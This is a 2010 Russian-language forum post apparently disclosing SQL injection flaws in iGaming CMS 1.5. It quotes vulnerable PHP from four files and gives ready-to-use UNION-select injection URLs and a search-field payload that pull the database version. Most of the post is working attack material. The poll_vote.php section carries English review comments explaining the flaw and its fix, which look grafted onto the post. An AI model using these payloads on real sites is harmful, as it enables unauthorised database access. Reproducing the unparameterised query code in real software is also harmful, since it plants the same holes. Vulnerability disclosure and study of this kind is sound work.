
17.03.2010, 13:31
iGaming CMS
Product : iGaming CMS
version : 1.5
site : forums.igamingcms.com
SQL inj
Файл screenshots.php
mq=off (magic_quotes_gpc)
PHP код:
...if (isset($_REQUEST[id])) {
$result = $db->Execute("SELECT * FROM `sp_screenshots` WHERE `id` = '$_REQUEST[id]' LIMIT 1");
echo $start_table . '<b>',stripslashes($result->fields['title']),'</b>' . $end_table . '<br />';
echo '<center><img src="',$result->fields['screen'],'" border="0" alt="',stripslashes($result->fields['title']),'"></center>';
}...
Result:
http://localhost/gami/screenshots.php?id=1 [sql]
http://localhost/gami/screenshots.php?id=-1'+union+select+1,version(),3,4,5--+
SQL inj
reviews.php
mq=off (magic_quotes_gpc)
PHP код:
... if (isset($_REQUEST['browse'])) {
$sql = $db->Execute("SELECT id,title,section FROM `sp_reviews`
WHERE `title` LIKE '".$_REQUEST['browse']."%'
ORDER BY `title`");...
Result:
http://localhost/gami/reviews.php?browse=Z [sql]
http://localhost/gami/reviews.php?browse=Z'+union+select+1,2,3/*
SQL inj
search.php
mq=off (magic_quotes_gpc)
PHP код:
... if ($_REQUEST['platform'] != 'all') {
$platform = "`section` = '" . $_REQUEST['platform'] . "' ";
} else {
$platform = "`section` LIKE '%' ";
}
if ($_REQUEST['exact'] == '1') {
$title = "`title` = '".$_REQUEST['keywords']."' ";
} else {
$title = "`title` LIKE '%".$_REQUEST['keywords']."%' ";
}
$result = $db->Execute("SELECT id,title,section,publisher,developer FROM `sp_games` WHERE $title AND $platform AND `published` = '1' ORDER BY `title`");
while ($row = $result->FetchNextObject()) {...
Result:
Посылаем POST- или GET-запрос.
$_REQUEST['keywords'] [sql] или на другую переменную...
поле Keywords пишем - %' union select 1,version(),3,4,5/*
Blind sql
poll_vote.php
PHP код:
// poll_vote.php: load the poll option named by the request-supplied id and
// record one vote per client IP. `$_REQUEST[id]` is interpolated straight into
// the SQL string here and again in the UPDATE below, without escaping or a cast;
// unless magic_quotes_gpc rewrites the quotes, that is the blind SQL injection
// this advisory reports. Mitigation: bind the value (e.g. a `?` placeholder with
// an input array, if `$db` is ADOdb as the Execute/RecordCount/fields API
// suggests) or cast it to int before it reaches the query.
$result = $db->Execute("SELECT * FROM sp_polls_options WHERE id = '$_REQUEST[id]'");
// pollid comes from the row fetched above and ip from the server-side
// REMOTE_ADDR. Only this lookup is error-checked (`or die`); the first query's
// result is used unchecked.
$ip = $db->Execute("SELECT * FROM sp_polls_iplog WHERE pollid = '" . $result->fields['poll_id'] . "' AND ip = '" . $_SERVER['REMOTE_ADDR'] . "';") or die($db->ErrorMsg());
// One vote per IP per poll. NOTE(review): the check (here) and the INSERT into
// the IP log (below) are separate statements, so concurrent requests from the
// same address can both pass this test; a UNIQUE key on (pollid, ip) or a
// transaction would close that window.
if ($ip->RecordCount() < 1)
{
// Read-modify-write of the counter in PHP rather than `count = count + 1` in
// SQL; concurrent votes can lose increments.
$count2 = $result->fields['count'] + 1;
// Second unescaped use of `$_REQUEST[id]` (same injection point as the SELECT).
$db->Execute("UPDATE `sp_polls_options` SET `count` = $count2 WHERE `id` = '$_REQUEST[id]'");
$db->Execute("INSERT INTO sp_polls_iplog (pollid,ip) VALUES ('" . $result->fields['poll_id'] . "','" . $_SERVER['REMOTE_ADDR'] . "');");
}
если честно, даже ковырять впадляк !!! много дыр...
Последний раз редактировалось Strilo4ka; 17.03.2010 в 15:00..